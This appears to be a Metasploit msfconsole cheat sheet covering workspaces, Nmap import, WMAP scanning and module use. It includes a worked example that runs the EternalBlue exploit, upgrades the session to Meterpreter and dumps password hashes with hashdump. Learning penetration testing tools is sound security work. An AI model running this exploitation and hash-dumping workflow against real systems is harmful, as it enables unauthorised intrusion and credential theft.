msfconsole

Workspace

  • A workspace is a container for organizing and managing penetration testing data.

  • Use workspace to create, switch, or delete workspaces.

  • Example:

    msf6> workspace -a NewWorkspace  # Add a new workspace
msf6> workspace NewWorkspace     # Switch to the new workspace

setg is used to set global variables that persist across modules and sessions.

msf6> setg RHOSTS 192.168.1.1  # Set global target IP

Importing Nmap Results

Metasploit can import Nmap scan results to populate target information.

msf6> db_import /path/to/nmap_scan.xml

WMAP

web application vulnerability scanner integrated into Metasploit. It is used to identify vulnerabilities in web applications.

msf6> load wmap
msf6> wmap_sites -a http://example.com
msf6> wmap_run -t

Working with Modules

Metasploit is modular, allowing users to perform specific tasks. The main types of modules are:

  • Auxiliary Modules: Perform information gathering, enumeration, and other non-exploit tasks (e.g., sniffing, fuzzing, or brute-forcing).

  • Exploit Modules: Designed to exploit vulnerabilities in target systems.

  • Post-Exploitation Modules: Used after gaining access to a system (e.g., privilege escalation, data extraction).

  1. Searching for Modules:

Use the search command to find modules based on keywords, type, or platform.

msf6> search "key word" type:exploit platform:windows

  1. Using a Module:

After identifying a module, use the use command to select it.

msf6> use exploit/windows/smb/ms17_010_eternalblue

  1. Setting Module Options:

Use options to view required and optional parameters. Set parameters using the set command.

msf6> options
msf6> set RHOSTS 192.168.1.1
msf6> set LHOST 192.168.1.2

  1. Running the Module:

Use run or exploit to execute the module.

msf6> exploit

Post-Exploitation

  1. Upgrading to Meterpreter:

    • After gaining a basic shell, upgrade it to a Meterpreter session for advanced post-exploitation capabilities.

    • Example:

      msf6> sessions -u <SESSION_ID>

  2. Meterpreter:

    • A powerful, extensible payload that provides advanced features like file manipulation, keylogging, and privilege escalation.

    • Example Commands:

      meterpreter> sysinfo          # Get system information
meterpreter> getuid           # Check current user privileges
meterpreter> hashdump         # Dump password hashes

References

  • Metasploit Documentation: The official documentation is a comprehensive resource for understanding and using Metasploit.

Example Workflow

  1. Start msfconsole:

    $ msfconsole

  2. Search for a module:

    msf6> search type:exploit platform:windows

  3. Use the module and set options:

    msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS 192.168.1.1
msf6> set LHOST 192.168.1.2

  4. Run the exploit:

    msf6> exploit

  5. Upgrade to Meterpreter:

    msf6> sessions -u -1

  6. Perform post-exploitation tasks:

    meterpreter> sysinfo
meterpreter> hashdump

PreviousMetasploitNextmsfvenom

Last updated